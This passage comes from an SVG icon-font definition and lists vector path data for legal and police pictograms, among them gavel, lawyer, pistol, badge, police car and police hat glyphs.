31-1-1z m-780-38c-2 6-2 10 0 15 3 8 5 16 7 24-5-10-10-20-15-30-3 7-4 14-4 21 0 3 1 6 1 9 0 2 2 4-1 6-1 1 0 5 0 7v39c-3-5-2-9-2-13-1-8-2-16-2-24 0-5-3-9-7-13-2 8-4 16-5 24-2 14-3 28-1 42 3 17 10 31 22 44 11-27 17-54 10-82 2 0 2 1 3 2 4 5 8 9 13 13 5 4 5 4 7-2 7-24 3-46-13-66-4-5-8-10-13-16z m664-341c-18-4-36-8-55-12 6 11 15 20 25 26 14 9 29 13 45 15 15 1 31 0 47-3 3 0 3-1 1-3-15-27-38-43-69-48-14-2-29-3-44-3-3 0-4 1-2 3 2 5 5 8 11 10 14 5 27 10 41 15z m-486-12c-18 4-35 9-53 12l32-12c3-1 6-2 9-3 5-1 8-5 10-10 2-2 1-3-1-3-8 0-15 0-23 1-17 1-34 3-50 11-18 8-31 22-41 39-1 2-1 3 1 3 31 6 61 6 89-10 11-6 20-14 26-25 1-1 1-2 1-3z m-38-33c15 8 30 13 46 16 15 3 30 3 44-3 9-4 17-10 23-18-18-1-35-1-52-2v0c14-2 27-3 41-4 7-1 10-4 14-9-13-4-25-7-38-9-15-2-30-2-44 4-14 5-24 14-34 25z m393-20c3 5 7 8 13 9 14 0 27 2 41 4-17 1-34 1-52 2 7 9 16 15 26 18 19 7 38 5 58-1 9-2 18-6 26-11 3-1 3-2 1-4-12-13-26-23-44-26-15-3-30-1-45 2-8 2-16 4-24 7z m-425 120c-16 7-31 13-46 19l-1-1c3-1 5-3 7-4 9-4 17-9 25-13 6-3 10-7 11-14-4-1-8 1-12 1-20 4-41 8-58 21-16 10-26 26-34 44 34 0 65-4 91-27 8-7 13-16 17-26z m576-13c1 6 4 11 10 14 11 5 22 11 32 18-15-6-29-12-45-19 3 9 7 17 13 23 14 14 31 22 49 26 15 3 29 5 45 4-4-10-9-19-15-27-14-18-34-28-56-34-10-2-20-4-30-5-1-1-2 0-3 0z m-117-64c9 14 18 28 27 42l0 0c-4-4-9-9-12-14-4-5-9-9-12-14-4-6-9-8-16-8 5 13 10 26 16 39 6 11 13 21 22 30 12 11 27 16 43 19 1 0 2 0 2-2-5-27-13-52-31-72-9-11-21-17-34-20l-2 0c-1 0-1 0-3 0z m-333 6c-6 0-11 1-15 6-8 11-17 22-26 32 9-15 18-29 28-44-9 1-17 3-24 7-15 9-24 23-32 38-7 15-11 30-14 46 0 2 0 3 3 3 26-4 46-18 59-41 9-15 15-31 21-47z m-87 50c-5 3-9 6-10 12-5 14-10 27-14 41 3-18 7-35 11-54-6 3-11 6-15 10-11 11-17 25-20 40-4 22-2 43 2 65 7-4 14-9 19-14 16-15 23-33 26-54 2-14 2-29 1-43 1-1 1-2 0-3z m508 0c3 17 7 34 11 51l-1 1-4-14-10-27c-2-6-3-7-10-10-1 11-1 22 0 33 1 13 3 25 7 37 7 18 20 31 36 42 1 0 3 2 3-1 5-25 6-50-1-74-5-16-14-29-29-37 0-1-1-2-2-1z m-610 85c-13 12-24 23-36 33l-1 0 16-18c3-4 7-8 11-12 4-4 4-9 4-14-25 14-49 28-63 54-6 11-9 23-10 36 0 2 1 3 3 2 25-9 48-22 64-44 7-11 12-22 12-37z m698 0c0 17 7 30 16 42 13 16 42 34 63 39-1-13-4-25-9-37-9-17-23-30-39-40-8-6-16-11-25-16 0 6 1 11 5 16 8 8 15 16 22 24 1 2 2 3 3 5l-36-33z m-26-9c3 13 6 27 9 40l-1 0c-2-7-5-13-7-20-1-4-3-7-4-11-1-4-4-6-6-8-2 0-3-1-3 1 0 23-1 46 10 67 7 11 16 20 27 27 2 2 3 2 4-1 4-25 5-49-6-73-4-8-10-15-18-20-1-1-3-2-5-2z m-646-1c-12 7-19 16-24 28-7 17-8 35-6 53 0 5 1 10 2 15 0 3 1 3 3 1 21-12 32-31 36-54 2-13 1-26 1-38 0-4-1-4-3-2-3 2-5 4-6 7-4 12-8 23-12 34 3-14 6-28 9-44z m760 286c4-9 6-17 7-26 3-23-6-43-17-63-4-6-8-12-12-18-2 5-3 9-1 14 3 12 6 24 8 36-5-14-10-29-16-44-3 6-4 12-5 17-2 19 3 35 12 51 6 12 14 23 24 33z m-817-85l-16-33c-5 15-5 29 1 43 6 15 16 26 29 35 2 2 3 1 4-1 8-28 3-52-16-73-3-4-5-7-8-11-1 0-1 0-1 0-3 4-3 9-1 14 3 8 6 17 9 26l-1 0z m776-32c-6 11-11 21-16 32l0-1c3-9 6-18 9-27 1-4 1-7-1-11 0-1-1-1-2 0-23 26-34 48-23 83 0 2 1 3 3 1 17-12 29-27 33-47 2-9 0-22-3-30z m-389-360c0-8 0-17 0-26-1-7-8-11-14-8-2 1-3 4-3 6 0 19 0 37 0 56 0 5 2 7 7 7 7 0 9-1 9-7 1-9 0-18 0-28h1z m-38 0v26c0 8 4 11 12 9 2-1 3-2 4-4 0-2 0-4 0-6v-50c0-2 0-3 0-5-1-3-2-5-6-4-1 0-2 0-3 0-5 0-7 1-7 6l0 28z m60 3v-23c0-1 0-3 0-4-1-7-7-10-13-7-3 1-3 4-3 7v52c0 9 3 11 12 10 2-1 3-2 3-4 1-2 1-4 1-6 0-8 0-17 0-25z" />
<glyph glyph-name="law" horiz-adv-x="1000" unicode="&#xebc7;" d="M976 240c-5 0-10 1-13 7-41 81-83 162-125 243-1 2-2 4-3 6 18 3 35 9 51 16 22 10 31 32 22 53-9 22-32 32-54 22-38-17-74-17-110 4-3 1-5 2-8 4-55 27-113 40-174 43-11 1-23 2-34 2 30 11 51 40 51 74 0 44-35 80-79 80s-79-36-79-80c0-34 21-62 51-74-9 0-18-1-27-1-69-4-135-19-196-52-34-17-67-16-100-1-23 10-47 2-57-19-9-21 0-44 23-56 15-7 32-12 50-15-2-4-4-8-6-11-40-78-80-156-120-233-4-9-9-14-18-12-10 2-16-2-21-10v-6c16-57 58-86 111-103 70-23 140-20 207 11 26 12 47 29 64 52 8 11 14 24 17 38 2 11-4 19-14 18-15-2-21 5-27 17-39 76-78 151-117 226-6 12-6 12 8 14 29 4 57 13 85 24 28 10 56 22 86 25 13 1 13 2 13-12 0-161 0-322 1-482 0-8-1-11-10-12-30-4-54-29-57-59-1-7-4-8-9-8-19 1-38 1-57 1-39 0-67-27-68-67h534c-1 37-30 65-68 66-19 1-38 1-57 0-6 0-8 1-9 8-3 31-28 56-58 59-6 1-8 2-8 8 0 164 0 327 0 491-1 8 3 8 9 7 26-2 51-10 75-19 35-14 70-27 107-31 10-1 4-6 3-10-28-54-57-108-85-163-13-25-26-50-39-76-3-5-6-8-12-7-3 1-6 0-9 0-11 0-17-7-14-18 5-29 23-51 46-69 32-24 69-37 108-43 56-8 111-2 162 22 28 14 52 32 69 59 6 10 9 22 13 33v6c-5 10-14 11-24 10z m-677 1h-198c33 62 65 123 99 186 34-62 66-124 99-186z m402 0c33 62 65 123 99 186 34-63 66-124 100-186h-199z" />
<glyph glyph-name="lawyer-alt-1" horiz-adv-x="1000" unicode="&#xebc8;" d="M790-122c-1 5-1 10 0 15 1 16-5 25-22 21-18-3-23 7-22 23l0 25c1 9-1 16-11 14-24-4-24 11-24 27 1 132 1 264 1 396 0 37 0 37 35 42 13 2 21 8 21 21 0 13-8 20-20 21-6 0-12 0-18 0h-462c-6 0-13 0-20-1-10-2-16-8-16-19-1-11 5-18 15-21 7-2 15-2 22-1 14 1 19-3 19-18 0-143 0-286 0-429 0-15-6-19-19-18-12 2-17-4-16-16 1-5-1-11 0-17 3-20-1-33-26-29-12 3-17-3-16-15 0-8 1-15 0-23-4-21 6-26 26-26 87 1 174 0 260 0 89 0 177 1 265 0 23 0 31 7 28 28z m-159 179c-30 0-46-16-48-47 0-18-8-20-22-20-41 0-81 1-121 0-15 0-22 2-23 20-2 32-18 46-51 47-15 0-18 6-17 19 0 88 0 175-1 263 0 14 5 18 19 19 35 3 48 16 50 50 1 13 4 18 17 18 44-1 88-1 132 0 13 0 16-4 17-17 3-37 14-48 52-51 14-1 16-7 16-19 0-44 0-88 0-131 0-43 0-86 0-129 1-15-2-22-20-22z m-302 464h15c116 0 232 0 348 1 8 0 24-7 20 12-8 32-16 64-36 91-17 23-40 32-68 27-12-3-23-3-35-1-23 5-43 0-60-16 7-13 19-13 32-8-3-22 5-40 7-60 2-25-15-30-35-32-46-4-67 3-69 24-1 8 0 17 2 24 4 14 5 28 6 45 13-8 23-4 33 8-17 8-30 20-48 17-19-4-38-4-58-1-26 5-47-9-62-31-11-16-18-35-24-54-13-46-14-46 32-46z m171 142c51-1 95 43 94 94 0 51-42 93-93 93-53 0-96-43-95-94 1-51 42-93 94-93z m115-324c-27 5-44 23-51 50-2 12-9 16-21 16-29 0-58-1-88 0-11 0-16-3-19-14-6-29-24-47-53-53-11-2-14-7-14-17 1-76 1-151 0-227 0-10 3-15 14-17 28-5 46-23 53-51 3-12 8-16 20-16 29 1 57 2 86 0 15 0 20 5 23 19 7 26 24 43 50 47 14 3 16 9 16 21 0 37 0 74 0 110 0 37-1 73 0 109 0 12-2 20-16 23z" />
<glyph glyph-name="lawyer-alt-2" horiz-adv-x="1000" unicode="&#xebc9;" d="M1000-97c-1 11-3 19-17 17-26-5-29 10-28 31 1 8 7 21-5 22-16 3-13 12-13 21-1 96 0 191-1 286 0 20-4 41 29 35 7-1 12 4 12 12-1 8-7 8-13 8-6 0-12 0-17 0-128 0-257 0-385 0-172 0-344 0-517 0-8 0-21 3-22-8-2-15 12-13 22-12 14 1 20-4 19-19 0-101 0-202 0-303 0-6 2-15-3-16-26-4-16-23-16-36-1-15-3-24-20-21-32 5-22-18-24-34-4-22 9-21 24-21 158 0 316 0 473 0 156 0 311 0 466 0 37 0 37 0 36 38z m-688 236c0-28 0-56 0-84 0-11-1-18-15-17-16 0-27-11-29-26-1-19-12-22-27-23-26-1-52 5-78 1-8-1-11 3-11 10 1 24-11 37-35 38-10 0-12 5-12 14 0 59 0 118 0 177 0 12 6 15 16 15 19 1 30 12 31 29 1 15 7 17 20 17 26-1 52-1 78 0 11 0 17-2 17-15 0-19 11-31 31-31 12 0 14-6 14-17 0-29 0-59 0-88z m291 84c0-54 0-109 0-163 0-13 1-22-18-23-15-1-26-14-27-31-1-13-9-18-20-16-23 4-47-1-71-1-15 0-24 4-26 21-2 17-12 28-29 28-14 0-17 6-16 18 0 28 0 57 0 86 0 27 0 54 0 81-1 14 2 21 18 22 17 0 28 12 28 28 1 17 10 17 22 17 19-1 38-1 57 0 19 0 39 5 39-26 0-11 13-20 25-20 17 1 18-8 18-21z m291-84c0-28-1-56 0-84 0-11-1-18-16-18-18 0-29-11-29-30 0-13-5-16-17-16-20 0-41 0-61-1-21-2-38-2-41 26-1 16-17 20-29 21-12 2-15 6-15 17 1 58 1 115 0 173 0 10 2 17 15 17 20 0 32 12 33 32 0 13 7 14 17 14 27-1 54-1 81 0 11 0 16-3 16-15 1-19 12-31 31-31 13 0 15-7 15-17-1-29 0-59 0-88z m-775 237c97 1 194 0 290 0 12 0 19 3 18 17 0 31 1 62 0 93-1 22-12 39-32 49-24 13-42 8-56-16-15-26-30-51-47-80-11 24-27 43 1 61 3 2 6 7 2 10-9 10-18 23-30 28-8 4-15-10-22-17-5-5-20-12-8-21 28-20 12-38 2-63-18 31-33 57-49 83-13 23-25 27-49 18-25-10-38-29-38-55-1-30 0-59-1-89 0-14 6-18 19-18z m454 111c-1-32 0-63-1-94 0-13 5-17 17-17 98 0 195 0 293 0 11 0 17 3 17 15-1 33 0 66-1 98-1 25-16 42-38 49-20 7-38 7-49-17-13-28-30-53-47-82-16 34-16 34 2 61 8 12-3 15-7 19-22 22-42 19-55-8-3-7 0-10 4-12 28-20 11-39 0-61-17 29-35 55-48 83-11 25-29 23-48 17-25-8-38-26-39-51z m163 64c59-1 107 46 108 104 0 60-47 107-108 108-59 0-108-47-109-105-1-58 49-107 109-107z m-471 0c59 0 107 47 107 105 0 60-48 107-109 107-59-1-107-48-108-106 0-58 50-107 110-106z m235 117c47 0 86 37 86 83 0 45-39 83-86 84-46 0-85-38-85-84-1-46 37-83 85-83z m-98-92c49-19 67-57 66-107-1-13 3-20 17-18 7 1 14 1 20 0 22-3 30 5 28 28-2 45 19 77 60 95 15 6 13 12 8 23-8 14-10 29-13 45-2 6 3 15-8 17-10 2-14-5-19-12-12-22-25-43-40-70-3 19-21 30-4 45 4 3 14 8 6 15-7 7-14 21-23 19-9-1-16-12-24-20-4-4-1-8 2-10 21-15 9-29 0-47-15 26-29 49-42 71-3 7-8 10-15 9-9 0-8-7-9-12-2-20-6-39-16-56-4-8-2-12 6-15z m-118-344c-16 4-26 16-31 32-1 4 0 11-7 11-24 0-48 1-71 0-14-1-9-18-17-25-4-4-7-11-12-12-31-6-27-30-27-52 1-15 0-30 0-45 0-19 1-39 0-59 0-16-1-32 22-35 7-1 14-8 18-16 6-16 14-28 35-25 17 3 41-6 50 3 17 16 27 40 52 47 2 1 2 8 2 12 0 48 0 97 0 145 0 10-2 16-14 19z m580 1c-13 3-24 12-27 26-3 14-11 18-24 16-11-1-21 0-32 0-19 2-36 1-40-23-1-7-8-14-15-15-30-4-26-26-25-46 0-16 0-33 0-49 0-14 0-28 0-42-1-23-6-49 27-58 6-1 12-9 14-15 9-26 29-24 48-21 18 2 42-8 50 22 3 11 13 18 25 21 12 3 15 10 15 21-1 47-1 94 0 140 0 12-3 19-16 23z m-275-92c0 21-1 43 0 64 0 14 0 25-18 29-12 2-22 12-25 25-3 17-13 17-26 16-10 0-20 0-30 0-19 2-35 1-40-23-2-11-14-18-26-21-11-2-14-7-14-18 0-48 0-96 0-145 0-7-1-14 9-16 20-5 31-18 38-36 1-5 4-10 10-10 22 0 44 0 66 1 13 1 10 17 18 24 4 4 6 10 10 11 32 7 29 31 28 55-1 15 0 29 0 44z" />
<glyph glyph-name="lawyer" horiz-adv-x="1000" unicode="&#xebca;" d="M612 587c24-5 48-11 72-16 12-2 17-9 18-21 2-26 7-52 9-78 3-30 25-17 40-19 18-2 13 12 13 21-3 38-7 76-9 115-1 15-7 24-22 29-57 21-113 43-169 66-11 5-14 2-17-9-7-21-13-43-30-59-12 16-12 30 6 40-15 19-30 20-46 0 18-11 17-25 5-41-15 20-23 40-29 62-3 9-6 12-17 8-56-23-113-46-171-67-11-5-18-11-19-24-3-36-6-71-10-107-3-35-3-35 32-34 13 0 19 4 20 17 2 20 7 41 7 61 1 26 8 43 37 44 15 1 29 6 44 10 30 6 31 6 32-24 6-139 10-277 17-415 4-91 2-183 14-274 1-15 7-22 21-22 15 0 19 8 22 23 9 49 8 99 9 149 3 69 5 138 7 207 6-53 5-106 9-159 4-67-3-135 12-202 3-13 9-17 21-18 10 0 18 4 20 16 2 15 6 30 6 45 3 61 4 122 7 183 6 159 13 318 18 477 1 16 7 19 21 16z m-111 106c42 1 76 36 77 79 0 42-34 77-77 78-43 1-80-36-80-78 0-43 37-79 80-79z m355-498l-94 174c4 3 7 8 7 13v40c0 10-8 18-18 18h-24c-10 0-18-8-18-18v-40c0-5 3-10 7-13l-94-174h-27c0-60 65-109 144-109s144 48 144 109h-27z m-218 0l92 169h18l92-169h-202z m-354 173c4 4 7 9 7 14v40c0 10-9 18-19 18h-23c-11 0-19-8-19-18v-40c0-5 3-10 7-14l-94-173h-26c0-61 64-109 144-109s144 48 144 109h-27l-94 173z m-124-173l91 169h19l91-169h-201z" />
<glyph glyph-name="legal" horiz-adv-x="1000" unicode="&#xebcb;" d="M904 99c25 164-107 245-157 276-2 1-5 2-7 3-14 9-30 16-45 20l-32-31-30 31h0c-17-3-33-10-47-20-4-2-7-4-11-6-103-81-149-38-155-34-18 13-41 11-58-2l-78 73 16 19c7 8 10 17 10 27l-49 40c-9-2-18-6-25-14l-45-54c-6-8-9-16-9-25l50-42c9 2 17 6 23 14l16 19 77-73 2 1c-12-21-6-48 14-62 6-4 108-59 171-12v-148h-253c9 0 15 6 15 15s-6 15-15 15h-1c0 14-12 26-27 26h-109c-15 0-27-11-27-26h-1c-9 0-15-7-15-15s6-15 15-15h-54v-55h875v55h-34z m-240 20h-1l-30 41 30 202h1l30-202-30-41z m141-20h-13v106c16-28 22-62 13-106z m-142 306c70 0 126 56 126 126 0 69-56 125-126 125-69 0-125-56-125-125 0-70 56-126 125-126z" />
<glyph glyph-name="pistol" horiz-adv-x="1000" unicode="&#xebcc;" d="M740 495c-61-20-110-56-152-102-24-27-38-59-44-95-6-42-31-71-69-90-66-33-151-19-200 33-22 24-35 52-36 84-2 45-2 90-2 134 0 10-3 13-12 13-68-1-135 0-203-1-18 0-22 4-22 22 0 44 0 89 0 134 0 14 5 18 19 19 17 0 17 0 17 18 0 8 0 17 0 26 0 10 5 17 14 21 9 4 18 3 26-4 20-17 40-35 60-53 7-6 15-9 24-9 126 1 252 0 378 1 30 0 51-11 63-39 2-6 5-6 11-4 41 16 83 17 125 8 3-1 5-2 8-3 11-4 17-13 16-23-2-11-10-18-22-18-18-1-35-3-50-12-10-7-21-15-20-26 0-8 14-11 22-15 15-9 32-13 49-19z m-379-121v-1c-15 0-30 1-46 0-16 0-27-10-28-25-1-34 8-65 37-85 41-29 85-30 130-11 32 14 45 40 44 73 0 16-8 28-22 37-6 4-9 4-11-5-5-17-14-33-26-47-13-14-29-26-48-32-7-2-13-2-18 3-5 6 0 11 3 16 4 6 8 12 12 17 11 16 20 32 26 50 3 8 1 10-7 10-15-1-30 0-46 0z m50 150v0c19 0 39-1 59 0 12 0 19 8 19 19 0 11-8 18-22 19-22 0-43 0-65 0-16 0-32 0-48 0-14-1-22-9-22-20 1-11 9-18 22-18 19 0 38 0 57 0z m0-81v1c19 0 38 0 57 0 13 0 21 6 21 18 0 11-7 19-20 19-39 1-78 1-117 0-12 0-20-8-19-19 0-11 8-18 21-19 19 0 38 0 57 0z m449-456c-36 0-72-2-108 5-41 8-59 25-68 66-9 42-10 84-12 127-1 17-2 35-4 52-3 30-15 41-45 44-7 1-13 1-20 2-12 2-17 8-15 21 2 14 7 28 16 40 36 50 82 87 140 108 42 14 73-5 84-47 3-11 5-21 4-32-1-16 5-28 16-39 25-25 54-47 79-73 41-43 63-94 70-151 2-20 3-39 3-58 0-36-19-57-54-63-14-2-29-2-43-2-15 0-29 0-43 0z m-81 339c0 21-16 38-36 38-21 0-38-17-38-37-1-21 17-38 38-38 19 0 36 17 36 37z" />
<glyph glyph-name="police-badge" horiz-adv-x="1000" unicode="&#xebcd;" d="M794 450c22-2 43-3 65-4 8-1 12 0 14 9 10 29 39 48 68 44 33-4 57-29 59-59 2-34-17-62-49-69-24-6-46 0-63 18-6 6-8 5-13 1-60-49-120-98-180-146-5-5-7-8-5-14 20-75 40-150 60-225 2-7 6-7 11-7 30 4 56-12 68-40 11-26 2-58-20-76-23-18-55-18-79-1-24 16-33 46-23 74 3 9 1 12-6 16-64 42-127 83-191 125-8 5-13 4-20-1-63-41-127-82-190-123-7-5-10-8-6-17 12-35-7-72-41-83-35-12-73 7-83 42-11 35 8 72 44 82 8 3 17 4 26 2 6-1 9 1 11 7 19 75 39 150 59 225 2 6 1 9-4 13-60 49-121 98-182 148-4 4-7 3-11-1-21-23-51-27-77-14-26 13-40 41-35 69 5 28 28 50 58 54 29 4 59-15 68-45 3-7 6-9 13-9 46 3 92 5 138 8 6 0 10 3 14 8 31 40 71 70 119 87 7 3 10 7 13 13 17 45 34 89 51 134 3 7 2 10-5 14-27 14-40 43-33 73 6 28 32 49 62 50 29 1 55-18 64-47 9-30-4-61-33-76-7-4-7-7-5-14 18-44 35-89 52-134 2-6 6-11 13-13 48-17 87-46 118-87 4-6 9-8 16-8 23-1 46-2 70-3z m-294-303c89 1 158 71 157 159-1 86-73 155-161 154-84-1-154-74-153-159 1-85 73-156 157-154z m2 270c62-1 113-52 112-115s-52-113-114-113c-63 0-114 52-114 115 1 62 52 113 116 113z" />
<glyph glyph-name="police-cap" horiz-adv-x="1000" unicode="&#xebce;" d="M103 228s137-293 395-279c258-14 395 279 395 279-65-9-395-49-395-49s-330 40-395 49z m843 304c-81 28-156 68-228 113-64 38-127 78-196 106h-44c-69-28-132-68-196-106-72-45-147-85-228-113-62-22-70-57-26-109 27-32 67-56 71-105 1-12 15-12 26-15 125-29 250-43 375-42 125-1 250 13 375 42 11 3 25 3 26 15 4 49 44 73 72 105 43 52 35 87-27 109z m-442-181c-1 0-3 0-4 0-1 0-3 0-4 0-41 0-98 79-96 133 1 31 51 63 97 63h6c46 0 96-32 97-63 2-54-55-133-96-133z" />
<glyph glyph-name="police-car-alt-1" horiz-adv-x="1000" unicode="&#xebcf;" d="M994 234c-5 34-24 60-57 73-28 11-57 21-87 30-27 9-56 14-83 24-52 21-103 45-155 67-35 14-71 28-109 30-9 0-18 0-26 1v0c0 3-3 6-7 6h-80c-4 0-7-3-7-6v-1c-30-2-61-4-92-7-15-2-31-4-44-10-73-35-145-70-217-106-8-3-12-7-13-16 0-10-3-20-5-29-5-35-15-68-11-103 1-14 2-28 3-41h55c1 12 2 23 3 35 6 42 43 76 83 79 55 4 91-35 98-70 3-14 4-29 6-44h487c0 15-2 29 0 43 9 49 50 78 102 73 46-5 81-43 83-89 0-9 1-17 2-28 23 1 46 2 68 3 6 1 10 4 9 11-2 25-3 50-6 75z m-735 105c12 24 25 45 42 64 11 11 26 14 40 16 31 3 61 5 92 7 2-34 3-66 4-99-59 4-118 8-178 12z m465-23c-75 2-151 5-226 9-9 0-18 1-29 1-1 33-3 65-5 98 32 2 61-3 90-10 61-16 118-41 172-73 1-1 3-2 5-4 5-5 10-11 15-17-8-2-15-5-22-4z m103-72c-42 0-76-34-76-76 0-43 34-77 76-77 42-1 78 35 78 77-1 42-35 76-78 76z m1-108c-18-1-32 13-33 31 0 18 14 32 32 33 18 0 33-15 33-33 0-17-15-31-32-31z m-673 108c-43 0-78-34-78-77 0-41 34-76 76-76 42-1 77 34 77 76 1 42-33 77-75 77z m-1-109c-18 1-32 15-32 32-1 18 14 33 32 32 18 0 32-13 32-32-1-18-14-32-32-32z m239 334h75c0 11 0 23 0 34-1 9-4 17-11 23-11 12-25 15-40 10-15-6-23-17-24-33-1-8 0-15 0-22 0-4 0-8 0-12z m69 36c1-10 1-21 1-32h-12c0 8 0 16 0 24 0 17-7 29-23 35 0 1-1 1-1 1 17 3 34-11 35-28z m24 7c0-4 3-5 6-5 5 0 10 0 15 0 5 0 10 0 15 0 4 0 6 1 6 5 0 4-3 5-6 5-10 0-20 0-30 0-4 0-6-1-6-5z m-8 40c3 3 7 7 10 10 4 4 7 8 11 12 2 2 3 5 0 7-3 3-5 2-7 0-7-8-14-15-21-23-3-2-4-5-1-7 3-3 6-2 8 1z m-140-45c5 0 10 0 16 0 5 0 9 0 14 0 4 0 6 1 6 5 1 4-2 5-5 5-11 0-21 0-31 0-3 0-6-1-6-5 0-4 3-5 6-5z m34 55c4-3 7-7 10-10 3-2 5-4 8-1 3 2 2 5 0 7-7 8-14 15-21 23-3 2-5 3-8 0-2-2-2-5 1-7 3-4 7-8 10-12z m58 5c4 0 5 3 5 6 0 10 0 21 0 31 0 3-1 5-5 6-3 0-5-3-5-6 0-5 0-11 0-16 0-5 0-10 0-14 0-4 1-6 5-7z" />
<glyph glyph-name="police-car-alt-2" horiz-adv-x="1000" unicode="&#xebd0;" d="M352 740c10 0 10 10 10 17 0 39 22 62 57 73 8 2 17 2 15 12-2 9-10 9-19 7-40-7-76-49-75-92 1-6 1-17 12-17z m230 90c34-12 55-34 56-71 1-8-2-20 11-19 11 1 10 12 10 21 0 40-33 80-73 88-9 1-18 4-20-8-2-10 9-9 16-11z m-192-74c0-6-1-14 7-16 10-2 11 5 12 12 2 18 11 30 29 35 5 1 11 5 9 12-3 8-10 8-17 7-20-3-40-27-40-50z m174 30c17-5 25-16 27-33 1-7 2-14 11-13 9 1 7 10 8 16-1 25-15 41-37 49-7 3-16 4-19-5-4-9 4-13 10-14z m416-455c0 33-24 61-56 68-10 2-19 3-29 4-8 34-17 69-25 104-7 31-16 61-21 92-7 51-50 90-97 91-6 0-172 1-172 1h-10c1 3 1 5 1 8v26c0 23-19 42-42 42h-56c-23 0-42-19-42-42v-26c0-3 0-5 1-8-52 0-103 0-155 0-47 0-84-18-105-62-6-13-7-29-10-43-15-61-30-122-46-185h-24c-38 0-72-32-72-71-1-88-1-176 0-264 0-35 28-65 64-70 8-1 16-1 26-2v-12c0-20 0-40 0-60 1-32 22-59 52-69 31-9 65 1 84 26 12 16 16 34 16 54 0 20 0 41 0 62h476c0-5 0-10 0-14 0-22-1-44 2-66 3-37 33-63 71-65 36-2 69 22 76 57 3 9 3 19 3 29 0 19 0 39 0 59 6 0 12 0 17 0 40 1 73 32 73 72 1 88 0 176 0 264z m-765 160c8 34 15 68 23 102 3 11 13 21 24 22 6 1 11 1 17 1 151 0 302 0 453 0 32 0 37-4 44-35 14-58 29-116 43-173 0-2 0-3 0-6h-626c7 30 15 60 22 89z m-40-349c-57 0-103 45-104 101 0 58 45 104 102 105 58 0 106-47 105-104 0-56-47-102-103-102z m650 0c-57 0-103 45-103 101-1 58 45 104 102 105 58 0 105-47 105-104-1-56-47-102-104-102z m-1 175c-40 0-72-33-72-73 1-40 33-72 73-72 40 0 73 33 73 72 0 40-33 73-74 73z m-650 3c-40-1-72-35-72-76 1-42 33-75 73-74 39 0 72 33 72 74 0 42-33 76-73 76z" />
<glyph glyph-name="police-car" horiz-adv-x="1000" unicode="&#xebd1;" d="M562 705c0 35-27 63-62 63-36 0-63-26-63-63 0-16 0-33 0-49 0-11 4-14 14-14h48v0h48c11 0 15 4 15 15 0 16 0 32 0 48z m-44 29c-19-1-32-14-32-33-1-12 0-24 0-36h-27c1 18-1 35 2 51 5 26 37 38 59 24 1-1 2-2 5-5-4 0-6 0-7-1z m-89 23c8 8 16 15 24 22-11 10-21 21-32 32-6 5-16 4-21-2-6-5-7-15-1-21 10-11 20-21 30-31z m156-66c15 0 29-1 43 0 9 0 15 7 15 16 0 8-6 16-14 16-15 1-30 0-45 0 0-11 1-21 1-32z m17 95c5 6 4 16-2 22-6 5-15 6-21 0-11-10-21-20-29-29 7-8 14-15 21-23 10 9 21 19 31 30z m-86 5c0 14 1 29 0 43 0 8-7 15-15 15-8 0-16-6-17-13 0-15 0-30 0-45l32 0z m-147-99c15-1 29-1 45-1v32c-11 0-23 0-34 0-4 0-8 0-12-1-7-2-11-8-11-15 0-8 5-15 12-15z m520-790c0-14-4-26-14-36-10-10-22-15-36-15s-26 5-36 15c-10 10-15 22-15 36v84h101v-84z m-677 0c0-14-5-26-15-36-9-10-21-15-36-15s-26 5-36 15c-9 10-14 22-14 36v84h101v-84z m608 353c-19 0-35-6-48-19-13-14-20-30-20-49 0-18 7-34 20-47 13-14 29-20 48-20 19 0 35 6 48 20 13 13 19 29 19 47 0 19-6 36-19 49-13 13-29 19-48 19z m-63 273c-4 12-8 21-13 26-5 5-12 8-21 8h-206v-34h17c5 0 9-1 12-5 3-3 5-7 5-12 0-5-2-9-5-12-3-3-7-5-12-5h-68c-5 0-9 2-12 5-3 3-5 7-5 12 0 5 2 9 5 12 3 4 7 5 12 5h17v34h-206c-9 0-16-2-21-6-4-4-9-13-13-28-2-7-7-21-14-44-7-22-14-45-22-68-7-24-14-45-20-63-6-19-9-28-9-28h389c0 23 8 44 25 62 16 19 36 28 59 28 23 0 43-9 59-28 17-18 25-39 25-62h87s-3 10-9 29c-6 19-13 40-20 64-8 24-15 47-22 69-7 22-12 36-14 41z m-644-338c0-19 6-35 19-48 13-13 29-20 48-20 19 0 35 7 48 20 13 13 20 29 20 48s-7 34-20 47c-13 14-29 20-48 20-19 0-35-6-48-20-13-13-19-29-19-47z m167 33h440v34h-440v-34z m0-67h440v34h-440v-34z m440 169c0 18-7 35-20 50-13 15-29 22-48 22s-34-7-47-22c-14-15-20-32-20-50 0-1 22-1 67-1s68 0 68 1z m-440-237h440v34h-440v-34z m609-68h-778c-19 0-35 7-48 20-13 14-20 30-20 48v169c0 19 7 35 20 48 13 13 29 20 48 20h34s2 8 7 24c6 17 12 36 19 58 8 22 15 45 22 68 7 23 12 40 16 53 8 26 16 43 26 53 9 10 23 15 42 15h446c19 0 32-4 41-12 8-8 17-27 27-56 9-29 22-70 39-123 17-54 26-80 26-80h34c18 0 34-7 47-20 14-14 20-30 20-48v-169c0-18-6-34-20-48-13-13-29-20-48-20z" />
<glyph glyph-name="police-hat" horiz-adv-x="1000" unicode="&#xebd2;" d="M967 406c-37 14-73 29-110 44-39 15-78 30-117 47-39 15-78 26-119 27-80 0-160 0-240 0-24 0-47-5-71-10-27-6-52-19-78-29-66-26-131-53-197-78-26-10-44-42-31-70 16-35 30-70 45-105 17-39 47-56 88-56 121 0 242 0 363 0l0 0c26 0 53 0 79 0 98 0 196-1 294 0 32 0 58 17 72 45 19 39 36 79 52 120 10 26-4 54-30 65z m-329 45c-16-18-25-37-17-62 4-11 8-23 9-35 3-30-9-56-28-80-21-27-50-43-78-61-18-11-32-10-48 0-29 18-57 34-78 61-17 20-27 43-28 63-2 23 4 38 9 53 8 24-1 43-16 60-4 4-3 6 0 9 11 10 22 21 32 32 3 3 5 4 8-1 18-23 34-27 60-14 11 6 22 12 31 19 5 4 7 4 11 1 11-9 22-15 34-21 24-11 42-7 57 14 4 6 6 5 10 1 10-11 21-21 31-32 3-2 4-4 1-7z m-54-74c-16 2-34 5-51 7-5 1-7 3-9 8-8 15-16 31-24 48-5-11-11-20-15-31-6-18-16-29-37-27 0 0-1 0-2-1-10-1-21-3-30-4 11-12 20-24 32-34 8-7 8-14 6-23-3-14-5-29-8-46 10 5 18 9 26 14 9 4 18 13 28 13 9 0 19-8 28-13 8-4 16-9 26-14-4 20-6 37-10 54-1 4 1 7 4 11 12 12 24 25 36 38z" />
